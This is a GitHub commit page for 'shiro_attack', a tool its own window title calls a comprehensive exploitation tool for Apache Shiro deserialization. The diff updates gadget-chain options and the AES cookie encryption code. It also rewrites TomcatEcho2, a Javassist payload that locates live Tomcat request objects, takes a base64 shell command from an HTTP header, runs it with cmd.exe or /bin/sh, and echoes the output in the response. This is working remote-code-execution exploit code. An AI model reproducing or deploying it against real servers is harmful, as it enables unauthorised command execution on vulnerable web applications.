Skip to content

Commit c86d8ed

Browse files
SummerSecSummerSec
committed
4.5.3 不在采用加载lib的方式去处理不同cb版本的问题,而是采用suuid字段修改的方式。
1 parent 9c0c5c6 commit c86d8ed

Some content is hidden

Large Commits have some content hidden by default. Use the searchbox below for content that may be hidden.

47 files changed

+372
-1661
lines changed

data/shiro_keys.txt

-1,208
This file was deleted.

pom.xml

+6-6
Original file line numberDiff line numberDiff line change
@@ -6,7 +6,7 @@
66

77
<groupId>org.example</groupId>
88
<artifactId>shiro_attack</artifactId>
9-
<version>4.5.2-SNAPSHOT</version>
9+
<version>4.5.3-SNAPSHOT</version>
1010
<build>
1111
<plugins>
1212
<plugin>
@@ -110,11 +110,11 @@
110110
<version>3.12.0</version>
111111
</dependency>
112112

113-
<!-- <dependency>-->
114-
<!-- <groupId>commons-beanutils</groupId>-->
115-
<!-- <artifactId>commons-beanutils</artifactId>-->
116-
<!-- <version>1.9.2</version>-->
117-
<!-- </dependency>-->
113+
<dependency>
114+
<groupId>commons-beanutils</groupId>
115+
<artifactId>commons-beanutils</artifactId>
116+
<version>1.9.2</version>
117+
</dependency>
118118

119119
<dependency>
120120
<groupId>commons-collections</groupId>

src/main/java/com/summersec/attack/Encrypt/CbcEncrypt.java

+4-3
Original file line numberDiff line numberDiff line change
@@ -3,6 +3,7 @@
33
import org.apache.shiro.codec.Base64;
44
import org.apache.shiro.crypto.AesCipherService;
55
import org.apache.shiro.util.ByteSource;
6+
import org.apache.shiro.util.SimpleByteSource;
67

78
import java.io.ByteArrayOutputStream;
89
import java.io.IOException;
@@ -30,8 +31,8 @@ public String encrypt(String key, byte[] objectBytes) {
3031

3132
byte[] keyDecode = Base64.decode(key);
3233
AesCipherService cipherService = new AesCipherService();
33-
ByteSource byteSource = cipherService.encrypt(objectBytes, keyDecode);
34-
byte[] value = byteSource.getBytes();
35-
return new String(Base64.encode(value));
34+
SimpleByteSource byteSource = (SimpleByteSource) cipherService.encrypt(objectBytes, keyDecode);
35+
return byteSource.toBase64();
36+
3637
}
3738
}

src/main/java/com/summersec/attack/Encrypt/GcmEncrypt.java

+3
Original file line numberDiff line numberDiff line change
@@ -1,5 +1,7 @@
11
package com.summersec.attack.Encrypt;
22

3+
import cn.hutool.crypto.SecureUtil;
4+
import cn.hutool.crypto.symmetric.AES;
35
import org.apache.shiro.codec.Base64;
46

57
import javax.crypto.Cipher;
@@ -10,6 +12,7 @@
1012
import java.io.ObjectOutputStream;
1113
import java.security.NoSuchAlgorithmException;
1214
import java.security.SecureRandom;
15+
import java.util.Arrays;
1316

1417
public class GcmEncrypt implements EncryptInterface {
1518
@Override

src/main/java/com/summersec/attack/UI/Main.java

+1-1
Original file line numberDiff line numberDiff line change
@@ -15,7 +15,7 @@ public Main() {
1515
@Override
1616
public void start(Stage primaryStage) throws Exception {
1717
Parent root = FXMLLoader.load(getClass().getResource("/gui.fxml"));
18-
primaryStage.setTitle("shiro反序列化漏洞综合利用工具 增强版 SummerSec & by3");
18+
primaryStage.setTitle("shiro反序列化漏洞综合利用工具 增强版 SummerSec");
1919
Scene scene = new Scene(root);
2020
primaryStage.setScene(scene);
2121
primaryStage.show();

src/main/java/com/summersec/attack/UI/MainController.java

+2-3
Original file line numberDiff line numberDiff line change
@@ -229,15 +229,14 @@ public void initComBoBox() {
229229
this.methodOpt.setPromptText("GET");
230230
this.methodOpt.setValue("GET");
231231
this.methodOpt.setItems(methods);
232-
ObservableList<String> gadgets = FXCollections.observableArrayList(new String[]{ "CommonsBeanutils1","CommonsBeanutils1_192", "CommonsCollections2", "CommonsCollections3", "CommonsCollectionsK1", "CommonsCollectionsK2", "CommonsBeanutilsString", "CommonsBeanutilsString_192", "CommonsBeanutilsAttrCompare", "CommonsBeanutilsAttrCompare_192", "CommonsBeanutilsPropertySource","CommonsBeanutilsPropertySource_192", "CommonsBeanutilsObjectToStringComparator", "CommonsBeanutilsObjectToStringComparator_192"});
232+
ObservableList<String> gadgets = FXCollections.observableArrayList(new String[]{ "CommonsBeanutils1","CommonsBeanutils1_183", "CommonsCollections2", "CommonsCollections3", "CommonsCollectionsK1", "CommonsCollectionsK2", "CommonsBeanutilsString", "CommonsBeanutilsString_183", "CommonsBeanutilsAttrCompare", "CommonsBeanutilsAttrCompare_183", "CommonsBeanutilsPropertySource","CommonsBeanutilsPropertySource_183", "CommonsBeanutilsObjectToStringComparator", "CommonsBeanutilsObjectToStringComparator_183"});
233233
// ObservableList<String> gadgets = FXCollections.observableArrayList(new String[]{ "CommonsBeanutils1" ,"CommonsBeanutils1_183" ,"CommonsCollections2", "CommonsCollections3", "CommonsCollectionsK1", "CommonsCollectionsK2", "CommonsBeanutilsString", "CommonsBeanutilsAttrCompare", "CommonsBeanutilsPropertySource", "CommonsBeanutilsObjectToStringComparator"});
234234
// ObservableList<String> gadgets = FXCollections.observableArrayList(new String[]{ "CommonsCollections2", "CommonsCollections3", "CommonsCollectionsK1", "CommonsCollectionsK2", "CommonsBeanutilsString", "CommonsBeanutilsAttrCompare", "CommonsBeanutilsPropertySource", "CommonsBeanutilsObjectToStringComparator"});
235235
this.gadgetOpt.setPromptText("CommonsBeanutilsString");
236236
this.gadgetOpt.setValue("CommonsBeanutilsString");
237237
this.gadgetOpt.setItems(gadgets);
238238
ObservableList<String> echoes = FXCollections.observableArrayList(new String[]{"AllEcho","TomcatEcho", "SpringEcho"});
239-
// ObservableList<String> echoes = FXCollections.observableArrayList(new String[]{"TomcatEcho", "SpringEcho"});
240-
// ObservableList<String> echoes = FXCollections.observableArrayList(new String[]{"TomcatEcho", "SpringEcho", "NoEcho", "ReverseEcho"});
239+
// ObservableList<String> echoes = FXCollections.observableArrayList(new String[]{"AllEcho","TomcatEcho", "TomcatEcho2", "SpringEcho"});
241240
this.echoOpt.setPromptText("TomcatEcho");
242241
this.echoOpt.setValue("TomcatEcho");
243242
this.echoOpt.setItems(echoes);

src/main/java/com/summersec/attack/core/AttackService.java

+1-1
Original file line numberDiff line numberDiff line change
@@ -202,7 +202,7 @@ public String GadgetPayload(String gadgetOpt, String echoOpt, String spcShiroKey
202202
Object chainObject = gadgetPayload.getObject(template);
203203
rememberMe = shiro.sendpayload(chainObject, this.shiroKeyWord, spcShiroKey);
204204
} catch (Exception var9) {
205-
// var9.printStackTrace();
205+
var9.printStackTrace();
206206
this.mainController.logTextArea.appendText(Utils.log(var9.getMessage()));
207207
}
208208

src/main/java/com/summersec/attack/deser/echo/TomcatEcho2.java

+6-115
Original file line numberDiff line numberDiff line change
@@ -1,128 +1,19 @@
11
package com.summersec.attack.deser.echo;
22

33
import javassist.*;
4+
import java.io.*;
45

5-
import java.io.IOException;
66

7-
/**
8-
* @ClassName: TomcatEcho2
9-
* @Description: TODO
10-
* @Author: Summer
11-
* @Date: 2022/1/19 11:33
12-
* @Version: v1.0.0
13-
* @Description:
14-
**/
15-
public class TomcatEcho2 implements EchoPayload{
7+
public class TomcatEcho2 implements EchoPayload {
168
@Override
179
public CtClass genPayload(final ClassPool pool) throws CannotCompileException, NotFoundException, IOException {
1810
final CtClass clazz = pool.makeClass("com.summersec.x.Test" + System.nanoTime());
1911
if (clazz.getDeclaredConstructors().length != 0) {
2012
clazz.removeConstructor(clazz.getDeclaredConstructors()[0]);
2113
}
22-
23-
24-
25-
clazz.addMethod(CtMethod.make(" private static void writeBody(Object var0, byte[] var1) throws Exception {\n" +
26-
" byte[] bs = (\"$$$\" + org.apache.shiro.codec.Base64.encodeToString(var1) + \"$$$\").getBytes();\n" +
27-
" Object var2;\n" +
28-
" Class var3;\n" +
29-
" try {\n" +
30-
" var3 = Class.forName(\"org.apache.tomcat.util.buf.ByteChunk\");\n" +
31-
" var2 = var3.newInstance();\n" +
32-
" var3.getDeclaredMethod(\"setBytes\", new Class[]{byte[].class, int.class, int.class}).invoke(var2, new Object[]{bs, new Integer(0), new Integer(bs.length)});\n" +
33-
" var0.getClass().getMethod(\"doWrite\", new Class[]{var3}).invoke(var0, new Object[]{var2});\n" +
34-
" } catch (Exception var5) {\n" +
35-
" var3 = Class.forName(\"java.nio.ByteBuffer\");\n" +
36-
" var2 = var3.getDeclaredMethod(\"wrap\", new Class[]{byte[].class}).invoke(var3, new Object[]{bs});\n" +
37-
" var0.getClass().getMethod(\"doWrite\", new Class[]{var3}).invoke(var0, new Object[]{var2});\n" +
38-
" } \n" +
39-
" }",clazz));
40-
41-
clazz.addMethod(CtMethod.make(" private static Object getFV(Object var0, String var1) throws Exception {\n" +
42-
" java.lang.reflect.Field var2 = null;\n" +
43-
" Class var3 = var0.getClass();\n" +
44-
"\n" +
45-
" while(var3 != Object.class) {\n" +
46-
" try {\n" +
47-
" var2 = var3.getDeclaredField(var1);\n" +
48-
" break;\n" +
49-
" } catch (NoSuchFieldException var5) {\n" +
50-
" var3 = var3.getSuperclass();\n" +
51-
" }\n" +
52-
" }\n" +
53-
"\n" +
54-
" if (var2 == null) {\n" +
55-
" throw new NoSuchFieldException(var1);\n" +
56-
" } else {\n" +
57-
" var2.setAccessible(true);\n" +
58-
" return var2.get(var0);\n" +
59-
" }\n" +
60-
" }", clazz));
61-
clazz.addConstructor(CtNewConstructor.make("public TomcatEcho() throws Exception {\n" +
62-
" boolean var4 = false;\n" +
63-
" Thread[] var5 = (Thread[]) getFV(Thread.currentThread().getThreadGroup(), \"threads\");\n" +
64-
" for (int var6 = 0; var6 < var5.length; ++var6) {\n" +
65-
" Thread var7 = var5[var6];\n" +
66-
" if (var7 != null) {\n" +
67-
" String var3 = var7.getName();\n" +
68-
" if (!var3.contains(\"exec\") && var3.contains(\"http\")) {\n" +
69-
" Object var1 = getFV(var7, \"target\");\n" +
70-
" if (var1 instanceof Runnable) {\n" +
71-
" try {\n" +
72-
" var1 = getFV(getFV(getFV(var1, \"this$0\"), \"handler\"), \"global\");\n" +
73-
" } catch (Exception var13) {\n" +
74-
" continue;\n" +
75-
" }\n" +
76-
" java.util.List var9 = (java.util.List) getFV(var1, \"processors\");\n" +
77-
"\n" +
78-
" for(int var10 = 0; var10 < var9.size(); ++var10) {\n" +
79-
" Object var11 = var9.get(var10);\n" +
80-
" var1 = getFV(var11, \"req\");\n" +
81-
" Object var2 = var1.getClass().getMethod(\"getResponse\",new Class[0]).invoke(var1, new Object[0]);\n" +
82-
" try {\n" +
83-
"\n" +
84-
"\n" +
85-
" var3 = (String)var1.getClass().getMethod(\"getHeader\", new Class[]{String.class}).invoke(var1, new Object[]{new String(\"Host\")});\n" +
86-
" if (var3 != null && !var3.isEmpty()) {\n" +
87-
" var2.getClass().getMethod(\"setStatus\", new Class[]{Integer.TYPE}).invoke(var2, new Object[]{new Integer(200)});\n" +
88-
" var2.getClass().getMethod(\"addHeader\", new Class[]{String.class, String.class}).invoke(var2, new Object[]{new String(\"Host\"), var3});\n" +
89-
" var4 = true;\n" +
90-
" }\n" +
91-
"\n" +
92-
" var3 = (String)var1.getClass().getMethod(\"getHeader\", new Class[]{String.class}).invoke(var1, new Object[]{new String(\"Authorization\")});\n" +
93-
" if (var3 != null && !var3.isEmpty()) {\n" +
94-
" var3 = org.apache.shiro.codec.Base64.decodeToString(var3.replaceAll(\"Basic \", \"\"));\n" +
95-
" String[] var12 = System.getProperty(\"os.name\").toLowerCase().contains(\"window\") ? new String[]{\"cmd.exe\", \"/c\", var3} : new String[]{\"/bin/sh\", \"-c\", var3};\n" +
96-
" writeBody(var2, (new java.util.Scanner((new ProcessBuilder(var12)).start().getInputStream())).useDelimiter(\"\\\\A\").next().getBytes());\n" +
97-
" var4 = true;\n" +
98-
" }\n" +
99-
"\n" +
100-
" if (var4) {\n" +
101-
" break;\n" +
102-
" }\n" +
103-
" }catch (Exception var14) {\n" +
104-
" writeBody(var2, var14.getMessage().getBytes());\n" +
105-
" }\n" +
106-
" }\n" +
107-
"\n" +
108-
" if (var4) {\n" +
109-
" break;\n" +
110-
" }\n" +
111-
" }\n" +
112-
" }\n" +
113-
" }\n" +
114-
" }\n" +
115-
" }",clazz));
116-
14+
clazz.addMethod(CtMethod.make(" private static void writeBody(Object var0, byte[] var1) throws Exception {\n byte[] bs = (\"$$$\" + org.apache.shiro.codec.Base64.encodeToString(var1) + \"$$$\").getBytes();\n Object var2;\n Class var3;\n try {\n var3 = Class.forName(\"org.apache.tomcat.util.buf.ByteChunk\");\n var2 = var3.newInstance();\n var3.getDeclaredMethod(\"setBytes\", new Class[]{byte[].class, int.class, int.class}).invoke(var2, new Object[]{bs, new Integer(0), new Integer(bs.length)});\n var0.getClass().getMethod(\"doWrite\", new Class[]{var3}).invoke(var0, new Object[]{var2});\n } catch (ClassNotFoundException var5) {\n var3 = Class.forName(\"java.nio.ByteBuffer\");\n var2 = var3.getDeclaredMethod(\"wrap\", new Class[]{byte[].class}).invoke(var3, new Object[]{bs});\n var0.getClass().getMethod(\"doWrite\", new Class[]{var3}).invoke(var0, new Object[]{var2});\n } catch (NoSuchMethodException var6) {\n var3 = Class.forName(\"java.nio.ByteBuffer\");\n var2 = var3.getDeclaredMethod(\"wrap\", new Class[]{byte[].class}).invoke(var3, new Object[]{bs});\n var0.getClass().getMethod(\"doWrite\", new Class[]{var3}).invoke(var0, new Object[]{var2});\n }\n\n}", clazz));
15+
clazz.addMethod(CtMethod.make(" private static Object getFV(Object var0, String var1) throws Exception {\n java.lang.reflect.Field var2 = null;\n Class var3 = var0.getClass();\n\n while(var3 != Object.class) {\n try {\n var2 = var3.getDeclaredField(var1);\n break;\n } catch (NoSuchFieldException var5) {\n var3 = var3.getSuperclass();\n }\n }\n\n if (var2 == null) {\n throw new NoSuchFieldException(var1);\n } else {\n var2.setAccessible(true);\n return var2.get(var0);\n }\n }", clazz));
16+
clazz.addConstructor(CtNewConstructor.make(" public TomcatEcho() throws Exception {\n boolean var4 = false;\n Thread[] var5 = (Thread[]) getFV(Thread.currentThread().getThreadGroup(), \"threads\");\n\n for (int var6 = 0; var6 < var5.length; ++var6) {\n Thread var7 = var5[var6];\n if (var7 != null) {\n String var3 = var7.getName();\n if (!var3.contains(\"exec\") && var3.contains(\"http\")) {\n Object var1 = getFV(var7, \"target\");\n if (var1 instanceof Runnable) {\n try {\n var1 = getFV(getFV(getFV(var1, \"this$0\"), \"handler\"), \"global\");\n } catch (Exception var13) {\n continue;\n }\n\n java.util.List var9 = (java.util.List) getFV(var1, \"processors\");\n\n for(int var10 = 0; var10 < var9.size(); ++var10) {\n Object var11 = var9.get(var10);\n var1 = getFV(var11, \"req\");\n Object var2 = var1.getClass().getMethod(\"getResponse\",new Class[0]).invoke(var1, new Object[0]);\n var3 = (String)var1.getClass().getMethod(\"getHeader\", new Class[]{String.class}).invoke(var1, new Object[]{new String(\"Ctmd\")});\n if (var3 != null && !var3.isEmpty()) {\n var2.getClass().getMethod(\"setStatus\", new Class[]{Integer.TYPE}).invoke(var2, new Object[]{new Integer(200)});\n var2.getClass().getMethod(\"addHeader\", new Class[]{String.class, String.class}).invoke(var2, new Object[]{new String(\"techo\"), var3});\n var4 = true;\n }\n\n var3 = (String)var1.getClass().getMethod(\"getHeader\", new Class[]{String.class}).invoke(var1, new Object[]{new String(\"c\")});\n if (var3 != null && !var3.isEmpty()) {\n var3 = org.apache.shiro.codec.Base64.decodeToString(var3);\n var2.getClass().getMethod(\"setStatus\", new Class[]{Integer.TYPE}).invoke(var2, new Object[]{new Integer(200)});\n String[] var12 = System.getProperty(\"os.name\").toLowerCase().contains(\"window\") ? new String[]{\"cmd.exe\", \"/c\", var3} : new String[]{\"/bin/sh\", \"-c\", var3};\n writeBody(var2, (new java.util.Scanner((new ProcessBuilder(var12)).start().getInputStream())).useDelimiter(\"\\\\A\").next().getBytes());\n var4 = true;\n }\n\n if (var4) {\n break;\n }\n }\n\n if (var4) {\n break;\n }\n }\n }\n }\n }\n}", clazz));
11717
return clazz;
11818
}
119-
120-
121-
public static void main(String[] args) throws NotFoundException, CannotCompileException, IOException {
122-
ClassPool pool = ClassPool.getDefault();
123-
// TomcatEcho2 tomcatEcho2 = new TomcatEcho2();
124-
SpringEcho springEcho = new SpringEcho();
125-
springEcho.genPayload(pool);
126-
// tomcatEcho2.genPayload(pool);
127-
}
128-
}
19+
}

0 commit comments

Comments
 (0)